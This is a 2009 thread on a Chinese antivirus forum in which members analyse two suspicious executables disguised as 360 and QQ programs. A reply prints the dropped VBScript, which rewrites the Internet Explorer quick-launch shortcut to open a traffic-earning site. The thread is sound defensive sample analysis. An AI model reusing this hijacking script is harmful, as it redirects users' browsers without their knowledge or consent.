查看: 6183|回复: 21
收起左侧

[病毒样本] 初步确定是恶意程序了。。过主流杀软

[复制链接]
单身熟男 该用户已被删除
发表于 2009-10-10 19:50:19 | 显示全部楼层 |阅读模式
昨天自己换了块主板、cpu、内存、显卡。。。
后来装上去蓝屏。。。
无奈拉去维修点。。
回来发现帮我重装了系统。。多了n多茄子东西,用工具看了看。。发现启动项多了

c:\WINDOWS\system32\360安全卫士.EXE
c:\WINDOWS\system32\腾讯QQ.EXE
这两个。。很不正常啊
上传到vt扫了下。。。主流的没报。。咖啡和几个非主流的报了
不过肯定是不正常。

决定重装了。。。之前再研究下这个茄子系统。。
上传这两个给大家看看有没有问题




如果没问题那算我居心叵测。。。如果有那么一丁丁点问题~~嘿嘿




根据lx的测试日志。。应该不是好东西了。。

vt的扫描就不贴图了。。
反正一个是4/36
一个是8/36

[ 本帖最后由 单身熟男 于 2009-10-10 20:41 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
tanlimo
发表于 2009-10-10 19:55:17 | 显示全部楼层
文件大小不对,位置也有问题,八成不是好东西。
hddu
发表于 2009-10-10 20:20:28 | 显示全部楼层
2009-10-10 20:16:31    运行应用程序      操作:阻止
进程路径:E:\360安全卫士\360安全卫士.EXE
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bt5844.bat
触发规则:所有程序规则->系统程序设置->*\cmd.exe

2009-10-10 20:16:56    创建文件      操作:阻止
进程路径:E:\腾讯QQ\腾讯QQ.EXE
文件路径:C:\WINDOWS\temp\vbs.vbs
触发规则:所有程序规则->文件创建设置_普通模式2->%SystemDrive%\*.vbs

2009-10-10 20:16:56    创建文件      操作:阻止
进程路径:E:\腾讯QQ\腾讯QQ.EXE
文件路径:C:\WINDOWS\temp\121785.vbs
触发规则:所有程序规则->文件创建设置_普通模式2->%SystemDrive%\*.vbs

评分

参与人数 1人气 +1 收起 理由
单身熟男 + 1 恩。。感谢测试

查看全部评分

剑舞江南
发表于 2009-10-10 20:24:05 | 显示全部楼层
移动版江民杀毒软件没报,但是ClamWin报了一个病毒:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
单身熟男 + 1 感谢测试

查看全部评分

单身熟男 该用户已被删除
 楼主| 发表于 2009-10-10 20:39:40 | 显示全部楼层
恩。。。根据2l的日志初步判断应该是恶意程序了。。。
那么根据我在vt上扫描的情况应该可以确定是过主流杀软的了。。。

改标题。。。赚眼球
saga3721
发表于 2009-10-10 20:48:03 | 显示全部楼层
如今的病毒作者离了CMD已经活不了了[:27:]
kingmuro
头像被屏蔽
发表于 2009-10-10 20:59:44 | 显示全部楼层
过kv2008
尤金卡巴斯基
发表于 2009-10-10 22:10:01 | 显示全部楼层
To KL
BING126
头像被屏蔽
发表于 2009-10-10 22:22:59 | 显示全部楼层
McAfee 报了2个可疑月神。。
asinasina
发表于 2009-10-10 22:28:02 | 显示全部楼层
; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=app936.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("APPDATA")            
Set link = Shell.CreateShortcut("C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk")
link.Arguments = "http://www.888ge.com/?2"
link.description = "查找并显示 Internet 上的信息和网站。"                             
link.TargetPath = "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
link.WindowStyle = 1                                 
link.WorkingDirectory = "C:\Program Files\Internet Explorer"                 
link.Save

Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("APPDATA")            
Set link = Shell.CreateShortcut("C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk")
link.Arguments = "http://www.888ge.com/?2"
link.description = "查找并显示 Internet 上的信息和网站。"                             
link.TargetPath = "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
link.WindowStyle = 1                                 
link.WorkingDirectory = "C:\Program Files\Internet Explorer"                 
link.Save

reg那个exe释放第一个win.ini
然后另外两个放vbs。。。。内容就下面
杯具啊,那QQ图标写的是360.com........
没发现联网,应该就是设网址到那个赚流量吧
没发现联网行为,应该不是木马

[ 本帖最后由 asinasina 于 2009-10-10 22:34 编辑 ]

评分

参与人数 1人气 +1 收起 理由
单身熟男 + 1 感谢测试。。。泪奔去了

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-20 06:12 , Processed in 0.078091 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表